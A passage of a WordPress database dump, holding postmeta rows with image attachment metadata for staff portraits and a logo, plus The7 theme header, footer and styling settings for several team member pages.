(31193,4041,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:323;s:6:\"height\";i:183;s:4:\"file\";s:23:\"2023/04/Geosat-logo.jpg\";s:8:\"filesize\";i:11932;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"Geosat-logo-300x170.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8466;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"Geosat-logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5504;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1681346070\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(31218,4071,'_edit_lock','1681943307:1'),
(31219,4072,'_wp_attached_file','2023/04/dr-sherin.png'),
(31220,4072,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:190;s:6:\"height\";i:240;s:4:\"file\";s:21:\"2023/04/dr-sherin.png\";s:8:\"filesize\";i:105288;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"dr-sherin-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:42159;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(31221,4071,'_thumbnail_id','4072'),
(31222,4071,'_edit_last','1'),
(31223,4071,'_dt_sidebar_position','disabled'),
(31224,4071,'_dt_sidebar_widgetarea_id','sidebar_1'),
(31225,4071,'_dt_sidebar_hide_on_mobile','0'),
(31226,4071,'_dt_footer_show','1'),
(31227,4071,'_dt_footer_widgetarea_id','sidebar_2'),
(31228,4071,'_dt_footer_hide_on_mobile','0'),
(31229,4071,'_dt_header_title','fancy'),
(31230,4071,'_dt_header_background','normal'),
(31231,4071,'_dt_header_background_below_slideshow','disabled'),
(31232,4071,'_dt_header_transparent_bg_color_scheme','light'),
(31233,4071,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(31234,4071,'_dt_header_transparent_top_bar_bg_opacity','25'),
(31235,4071,'_dt_header_transparent_bg_color','#000000'),
(31236,4071,'_dt_header_transparent_bg_opacity','50'),
(31237,4071,'_dt_header_disabled_background','normal'),
(31238,4071,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(31239,4071,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(31240,4071,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(31241,4071,'_dt_header_disabled_transparent_bg_color','#000000'),
(31242,4071,'_dt_header_disabled_transparent_bg_opacity','50'),
(31243,4071,'_dt_page_overrides_top_margin',''),
(31244,4071,'_dt_page_overrides_right_margin',''),
(31245,4071,'_dt_page_overrides_bottom_margin',''),
(31246,4071,'_dt_page_overrides_left_margin',''),
(31247,4071,'_dt_mobile_page_padding_top',''),
(31248,4071,'_dt_mobile_page_padding_right',''),
(31249,4071,'_dt_mobile_page_padding_bottom',''),
(31250,4071,'_dt_mobile_page_padding_left',''),
(31251,4071,'_dt_fancy_header_layout_heading',''),
(31252,4071,'_dt_fancy_header_title_aligment','center'),
(31253,4071,'_dt_fancy_header_height','300'),
(31254,4071,'_dt_fancy_header_padding-top','0px'),
(31255,4071,'_dt_fancy_header_padding-bottom','0px'),
(31256,4071,'_dt_fancy_header_breadcrumbs_heading',''),
(31257,4071,'_dt_fancy_header_breadcrumbs','disabled'),
(31258,4071,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(31259,4071,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(31260,4071,'_dt_fancy_header_title_heading',''),
(31261,4071,'_dt_fancy_header_title_mode','generic'),
(31262,4071,'_dt_fancy_header_title',''),
(31263,4071,'_dt_fancy_header_title_font_size','30'),
(31264,4071,'_dt_fancy_header_title_line_height','36'),
(31265,4071,'_dt_fancy_header_text_transform','none'),
(31266,4071,'_dt_fancy_header_title_color_mode','color'),
(31267,4071,'_dt_fancy_header_title_color','#ffffff'),
(31268,4071,'_dt_fancy_header_subtitle_heading',''),
(31269,4071,'_dt_fancy_header_subtitle',''),
(31270,4071,'_dt_fancy_header_subtitle_font_size','18'),
(31271,4071,'_dt_fancy_header_subtitle_line_height','26'),
(31272,4071,'_dt_fancy_header_subtitle_text_transform','none'),
(31273,4071,'_dt_fancy_header_subtitle_color_mode','color'),
(31274,4071,'_dt_fancy_header_subtitle_color','#ffffff'),
(31275,4071,'_dt_fancy_header_bg_heading',''),
(31276,4071,'_dt_fancy_header_bg_color','#222222'),
(31277,4071,'_dt_fancy_header_bg_image_origin','custom'),
(31278,4071,'_dt_fancy_header_bg_image','a:0:{}'),
(31279,4071,'_dt_fancy_header_bg_repeat','no-repeat'),
(31280,4071,'_dt_fancy_header_bg_position_x','center'),
(31281,4071,'_dt_fancy_header_bg_position_y','center'),
(31282,4071,'_dt_fancy_header_bg_fullscreen','1'),
(31283,4071,'_dt_fancy_header_bg_overlay','0'),
(31284,4071,'_dt_fancy_header_overlay_color','#000'),
(31285,4071,'_dt_fancy_header_bg_overlay_opacity','50'),
(31286,4071,'_dt_fancy_header_scroll_effect','default'),
(31287,4071,'_dt_fancy_header_bg_parallax','0.5'),
(31288,4071,'_dt_fancy_header_responsiveness_heading',''),
(31289,4071,'_dt_fancy_header_responsiveness','disabled'),
(31290,4071,'_dt_fancy_header_responsiveness_switch','778px'),
(31291,4071,'_dt_fancy_header_responsive_height','70'),
(31292,4071,'_dt_fancy_header_responsive_font_size','30'),
(31293,4071,'_dt_fancy_header_responsive_title_line_height','38'),
(31294,4071,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(31295,4071,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(31296,4071,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(31297,4071,'_dt_teammate_options_go_to_single','1'),
(31298,4071,'_dt_teammate_options_position',''),
(31299,4071,'_dt_teammate_options_website',''),
(31300,4071,'_dt_teammate_options_mail',''),
(31301,4071,'_dt_teammate_options_facebook',''),
(31302,4071,'_dt_teammate_options_twitter',''),
(31303,4071,'_dt_teammate_options_dribbble',''),
(31304,4071,'_dt_teammate_options_you-tube',''),
(31305,4071,'_dt_teammate_options_rss',''),
(31306,4071,'_dt_teammate_options_delicious',''),
(31307,4071,'_dt_teammate_options_flickr',''),
(31308,4071,'_dt_teammate_options_lastfm',''),
(31309,4071,'_dt_teammate_options_linkedin',''),
(31310,4071,'_dt_teammate_options_vimeo',''),
(31311,4071,'_dt_teammate_options_tumbler',''),
(31312,4071,'_dt_teammate_options_pinterest',''),
(31313,4071,'_dt_teammate_options_devian',''),
(31314,4071,'_dt_teammate_options_skype',''),
(31315,4071,'_dt_teammate_options_github',''),
(31316,4071,'_dt_teammate_options_instagram',''),
(31317,4071,'_dt_teammate_options_stumbleupon',''),
(31318,4071,'_dt_teammate_options_behance',''),
(31319,4071,'_dt_teammate_options_px-500',''),
(31320,4071,'_dt_teammate_options_tripedvisor',''),
(31321,4071,'_dt_teammate_options_vk',''),
(31322,4071,'_dt_teammate_options_foursquare',''),
(31323,4071,'_dt_teammate_options_xing',''),
(31324,4071,'_dt_teammate_options_weibo',''),
(31325,4071,'_dt_teammate_options_odnoklassniki',''),
(31326,4071,'_dt_teammate_options_research-gate',''),
(31327,4071,'_dt_teammate_options_yelp',''),
(31328,4071,'_dt_teammate_options_blogger',''),
(31329,4071,'_dt_teammate_options_soundcloud',''),
(31330,4071,'_dt_teammate_options_viber',''),
(31331,4071,'_dt_teammate_options_whatsapp',''),
(31332,4071,'_dt_teammate_options_reddit',''),
(31333,4071,'_dt_teammate_options_snapchat',''),
(31334,4071,'_dt_teammate_options_telegram',''),
(31335,4071,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(31336,4073,'_edit_lock','1681943985:1'),
(31337,4074,'_wp_attached_file','2023/04/dr-mohamed-hassan.png'),
(31338,4074,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:203;s:6:\"height\";i:230;s:4:\"file\";s:29:\"2023/04/dr-mohamed-hassan.png\";s:8:\"filesize\";i:55452;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"dr-mohamed-hassan-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31653;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(31339,4073,'_thumbnail_id','4074'),
(31340,4073,'_edit_last','1'),
(31341,4073,'_dt_sidebar_position','disabled'),
(31342,4073,'_dt_sidebar_widgetarea_id','sidebar_1'),
(31343,4073,'_dt_sidebar_hide_on_mobile','0'),
(31344,4073,'_dt_footer_show','1'),
(31345,4073,'_dt_footer_widgetarea_id','sidebar_2'),
(31346,4073,'_dt_footer_hide_on_mobile','0'),
(31347,4073,'_dt_header_title','fancy'),
(31348,4073,'_dt_header_background','normal'),
(31349,4073,'_dt_header_background_below_slideshow','disabled'),
(31350,4073,'_dt_header_transparent_bg_color_scheme','light'),
(31351,4073,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(31352,4073,'_dt_header_transparent_top_bar_bg_opacity','25'),
(31353,4073,'_dt_header_transparent_bg_color','#000000'),
(31354,4073,'_dt_header_transparent_bg_opacity','50'),
(31355,4073,'_dt_header_disabled_background','normal'),
(31356,4073,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(31357,4073,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(31358,4073,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(31359,4073,'_dt_header_disabled_transparent_bg_color','#000000'),
(31360,4073,'_dt_header_disabled_transparent_bg_opacity','50'),
(31361,4073,'_dt_page_overrides_top_margin',''),
(31362,4073,'_dt_page_overrides_right_margin',''),
(31363,4073,'_dt_page_overrides_bottom_margin',''),
(31364,4073,'_dt_page_overrides_left_margin',''),
(31365,4073,'_dt_mobile_page_padding_top',''),
(31366,4073,'_dt_mobile_page_padding_right',''),
(31367,4073,'_dt_mobile_page_padding_bottom',''),
(31368,4073,'_dt_mobile_page_padding_left',''),
(31369,4073,'_dt_fancy_header_layout_heading',''),
(31370,4073,'_dt_fancy_header_title_aligment','center'),
(31371,4073,'_dt_fancy_header_height','300'),
(31372,4073,'_dt_fancy_header_padding-top','0px'),
(31373,4073,'_dt_fancy_header_padding-bottom','0px'),
(31374,4073,'_dt_fancy_header_breadcrumbs_heading',''),
(31375,4073,'_dt_fancy_header_breadcrumbs','disabled'),
(31376,4073,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(31377,4073,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(31378,4073,'_dt_fancy_header_title_heading',''),
(31379,4073,'_dt_fancy_header_title_mode','generic'),
(31380,4073,'_dt_fancy_header_title',''),
(31381,4073,'_dt_fancy_header_title_font_size','30'),
(31382,4073,'_dt_fancy_header_title_line_height','36'),
(31383,4073,'_dt_fancy_header_text_transform','none'),
(31384,4073,'_dt_fancy_header_title_color_mode','color'),
(31385,4073,'_dt_fancy_header_title_color','#ffffff'),
(31386,4073,'_dt_fancy_header_subtitle_heading',''),
(31387,4073,'_dt_fancy_header_subtitle',''),
(31388,4073,'_dt_fancy_header_subtitle_font_size','18'),
(31389,4073,'_dt_fancy_header_subtitle_line_height','26'),
(31390,4073,'_dt_fancy_header_subtitle_text_transform','none'),
(31391,4073,'_dt_fancy_header_subtitle_color_mode','color'),
(31392,4073,'_dt_fancy_header_subtitle_color','#ffffff'),
(31393,4073,'_dt_fancy_header_bg_heading',''),
(31394,4073,'_dt_fancy_header_bg_color','#222222'),
(31395,4073,'_dt_fancy_header_bg_image_origin','custom'),
(31396,4073,'_dt_fancy_header_bg_image','a:0:{}'),
(31397,4073,'_dt_fancy_header_bg_repeat','no-repeat'),
(31398,4073,'_dt_fancy_header_bg_position_x','center'),
(31399,4073,'_dt_fancy_header_bg_position_y','center'),
(31400,4073,'_dt_fancy_header_bg_fullscreen','1'),
(31401,4073,'_dt_fancy_header_bg_overlay','0'),
(31402,4073,'_dt_fancy_header_overlay_color','#000'),
(31403,4073,'_dt_fancy_header_bg_overlay_opacity','50'),
(31404,4073,'_dt_fancy_header_scroll_effect','default'),
(31405,4073,'_dt_fancy_header_bg_parallax','0.5'),
(31406,4073,'_dt_fancy_header_responsiveness_heading',''),
(31407,4073,'_dt_fancy_header_responsiveness','enabled'),
(31408,4073,'_dt_fancy_header_responsiveness_switch','778px'),
(31409,4073,'_dt_fancy_header_responsive_height','70'),
(31410,4073,'_dt_fancy_header_responsive_font_size','30'),
(31411,4073,'_dt_fancy_header_responsive_title_line_height','38'),
(31412,4073,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(31413,4073,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(31414,4073,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(31415,4073,'_dt_teammate_options_go_to_single','1'),
(31416,4073,'_dt_teammate_options_position',''),
(31417,4073,'_dt_teammate_options_website',''),
(31418,4073,'_dt_teammate_options_mail',''),
(31419,4073,'_dt_teammate_options_facebook',''),
(31420,4073,'_dt_teammate_options_twitter',''),
(31421,4073,'_dt_teammate_options_dribbble',''),
(31422,4073,'_dt_teammate_options_you-tube',''),
(31423,4073,'_dt_teammate_options_rss',''),
(31424,4073,'_dt_teammate_options_delicious',''),
(31425,4073,'_dt_teammate_options_flickr',''),
(31426,4073,'_dt_teammate_options_lastfm',''),
(31427,4073,'_dt_teammate_options_linkedin',''),
(31428,4073,'_dt_teammate_options_vimeo',''),
(31429,4073,'_dt_teammate_options_tumbler',''),
(31430,4073,'_dt_teammate_options_pinterest',''),
(31431,4073,'_dt_teammate_options_devian',''),
(31432,4073,'_dt_teammate_options_skype',''),
(31433,4073,'_dt_teammate_options_github',''),
(31434,4073,'_dt_teammate_options_instagram',''),
(31435,4073,'_dt_teammate_options_stumbleupon',''),
(31436,4073,'_dt_teammate_options_behance',''),
(31437,4073,'_dt_teammate_options_px-500',''),
(31438,4073,'_dt_teammate_options_tripedvisor',''),
(31439,4073,'_dt_teammate_options_vk',''),
(31440,4073,'_dt_teammate_options_foursquare',''),
(31441,4073,'_dt_teammate_options_xing',''),
(31442,4073,'_dt_teammate_options_weibo',''),
(31443,4073,'_dt_teammate_options_odnoklassniki',''),
(31444,4073,'_dt_teammate_options_research-gate',''),
(31445,4073,'_dt_teammate_options_yelp',''),
(31446,4073,'_dt_teammate_options_blogger',''),
(31447,4073,'_dt_teammate_options_soundcloud',''),
(31448,4073,'_dt_teammate_options_viber',''),
(31449,4073,'_dt_teammate_options_whatsapp',''),
(31450,4073,'_dt_teammate_options_reddit',''),
(31451,4073,'_dt_teammate_options_snapchat',''),
(31452,4073,'_dt_teammate_options_telegram',''),
(31453,4073,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(31454,4075,'_edit_lock','1681944310:1'),
(31455,4076,'_wp_attached_file','2023/04/dr-hamdy.png'),
(31456,4076,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:140;s:6:\"height\";i:200;s:4:\"file\";s:20:\"2023/04/dr-hamdy.png\";s:8:\"filesize\";i:34590;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"dr-hamdy-140x150.png\";s:5:\"width\";i:140;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:30028;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(31457,4075,'_thumbnail_id','4076'),
(31458,4075,'_edit_last','1'),
(31459,4075,'_dt_sidebar_position','disabled'),
(31460,4075,'_dt_sidebar_widgetarea_id','sidebar_1'),
(31461,4075,'_dt_sidebar_hide_on_mobile','0'),
(31462,4075,'_dt_footer_show','1'),
(31463,4075,'_dt_footer_widgetarea_id','sidebar_2'),
(31464,4075,'_dt_footer_hide_on_mobile','0'),
(31465,4075,'_dt_header_title','fancy'),
(31466,4075,'_dt_header_background','normal'),
(31467,4075,'_dt_header_background_below_slideshow','disabled'),
(31468,4075,'_dt_header_transparent_bg_color_scheme','light'),
(31469,4075,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(31470,4075,'_dt_header_transparent_top_bar_bg_opacity','25'),
(31471,4075,'_dt_header_transparent_bg_color','#000000'),
(31472,4075,'_dt_header_transparent_bg_opacity','50'),
(31473,4075,'_dt_header_disabled_background','normal'),
(31474,4075,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(31475,4075,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(31476,4075,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(31477,4075,'_dt_header_disabled_transparent_bg_color','#000000'),
(31478,4075,'_dt_header_disabled_transparent_bg_opacity','50'),
(31479,4075,'_dt_page_overrides_top_margin',''),
(31480,4075,'_dt_page_overrides_right_margin',''),
(31481,4075,'_dt_page_overrides_bottom_margin',''),
(31482,4075,'_dt_page_overrides_left_margin',''),
(31483,4075,'_dt_mobile_page_padding_top',''),
(31484,4075,'_dt_mobile_page_padding_right',''),
(31485,4075,'_dt_mobile_page_padding_bottom',''),
(31486,4075,'_dt_mobile_page_padding_left',''),
(31487,4075,'_dt_fancy_header_layout_heading',''),
(31488,4075,'_dt_fancy_header_title_aligment','center'),
(31489,4075,'_dt_fancy_header_height','300'),
(31490,4075,'_dt_fancy_header_padding-top','0px'),
(31491,4075,'_dt_fancy_header_padding-bottom','0px'),
(31492,4075,'_dt_fancy_header_breadcrumbs_heading',''),
(31493,4075,'_dt_fancy_header_breadcrumbs','disabled'),
(31494,4075,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(31495,4075,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(31496,4075,'_dt_fancy_header_title_heading',''),
(31497,4075,'_dt_fancy_header_title_mode','generic'),
(31498,4075,'_dt_fancy_header_title',''),
(31499,4075,'_dt_fancy_header_title_font_size','30'),
(31500,4075,'_dt_fancy_header_title_line_height','36'),
(31501,4075,'_dt_fancy_header_text_transform','none'),
(31502,4075,'_dt_fancy_header_title_color_mode','color'),
(31503,4075,'_dt_fancy_header_title_color','#ffffff'),
(31504,4075,'_dt_fancy_header_subtitle_heading',''),
(31505,4075,'_dt_fancy_header_subtitle',''),
(31506,4075,'_dt_fancy_header_subtitle_font_size','18'),
(31507,4075,'_dt_fancy_header_subtitle_line_height','26'),
(31508,4075,'_dt_fancy_header_subtitle_text_transform','none'),
(31509,4075,'_dt_fancy_header_subtitle_color_mode','color'),
(31510,4075,'_dt_fancy_header_subtitle_color','#ffffff'),
(31511,4075,'_dt_fancy_header_bg_heading',''),
(31512,4075,'_dt_fancy_header_bg_color','#222222'),
(31513,4075,'_dt_fancy_header_bg_image_origin','custom'),
(31514,4075,'_dt_fancy_header_bg_image','a:0:{}'),
(31515,4075,'_dt_fancy_header_bg_repeat','no-repeat'),
(31516,4075,'_dt_fancy_header_bg_position_x','center'),
(31517,4075,'_dt_fancy_header_bg_position_y','center'),
(31518,4075,'_dt_fancy_header_bg_fullscreen','1'),
(31519,4075,'_dt_fancy_header_bg_overlay','0'),
(31520,4075,'_dt_fancy_header_overlay_color','#000'),
(31521,4075,'_dt_fancy_header_bg_overlay_opacity','50'),
(31522,4075,'_dt_fancy_header_scroll_effect','default'),
(31523,4075,'_dt_fancy_header_bg_parallax','0.5'),
(31524,4075,'_dt_fancy_header_responsiveness_heading',''),
(31525,4075,'_dt_fancy_header_responsiveness','enabled'),
(31526,4075,'_dt_fancy_header_responsiveness_switch','778px'),
(31527,4075,'_dt_fancy_header_responsive_height','70'),
(31528,4075,'_dt_fancy_header_responsive_font_size','30'),
(31529,4075,'_dt_fancy_header_responsive_title_line_height','38'),
(31530,4075,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(31531,4075,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(31532,4075,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(31533,4075,'_dt_teammate_options_go_to_single','1'),
(31534,4075,'_dt_teammate_options_position',''),
(31535,4075,'_dt_teammate_options_website',''),
(31536,4075,'_dt_teammate_options_mail',''),
(31537,4075,'_dt_teammate_options_facebook',''),
(31538,4075,'_dt_teammate_options_twitter',''),
(31539,4075,'_dt_teammate_options_dribbble',''),
(31540,4075,'_dt_teammate_options_you-tube',''),
(31541,4075,'_dt_teammate_options_rss',''),
(31542,4075,'_dt_teammate_options_delicious',''),
(31543,4075,'_dt_teammate_options_flickr',''),
(31544,4075,'_dt_teammate_options_lastfm',''),
(31545,4075,'_dt_teammate_options_linkedin',''),
(31546,4075,'_dt_teammate_options_vimeo',''),
(31547,4075,'_dt_teammate_options_tumbler',''),
(31548,4075,'_dt_teammate_options_pinterest',''),
(31549,4075,'_dt_teammate_options_devian',''),
(31550,4075,'_dt_teammate_options_skype',''),
(31551,4075,'_dt_teammate_options_github',''),
(31552,4075,'_dt_teammate_options_instagram',''),
(31553,4075,'_dt_teammate_options_stumbleupon',''),
(31554,4075,'_dt_teammate_options_behance',''),
(31555,4075,'_dt_teammate_options_px-500',''),
(31556,4075,'_dt_teammate_options_tripedvisor',''),
(31557,4075,'_dt_teammate_options_vk',''),
(31558,4075,'_dt_teammate_options_foursquare',''),
(31559,4075,'_dt_teammate_options_xing',''),
(31560,4075,'_dt_teammate_options_weibo',''),
(31561,4075,'_dt_teammate_options_odnoklassniki',''),
(31562,4075,'_dt_teammate_options_research-gate',''),
(31563,4075,'_dt_teammate_options_yelp',''),
(31564,4075,'_dt_teammate_options_blogger',''),
(31565,4075,'_dt_teammate_options_soundcloud',''),
(31566,4075,'_dt_teammate_options_viber',''),
(31567,4075,'_dt_teammate_options_whatsapp',''),
(31568,4075,'_dt_teammate_options_reddit',''),
(31569,4075,'_dt_teammate_options_snapchat',''),
(31570,4075,'_dt_teammate_options_telegram',''),
(31571,4075,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(31572,4077,'_edit_lock','1681945135:1'),
(31573,4078,'_wp_attached_file','2023/04/dr-helal.png'),
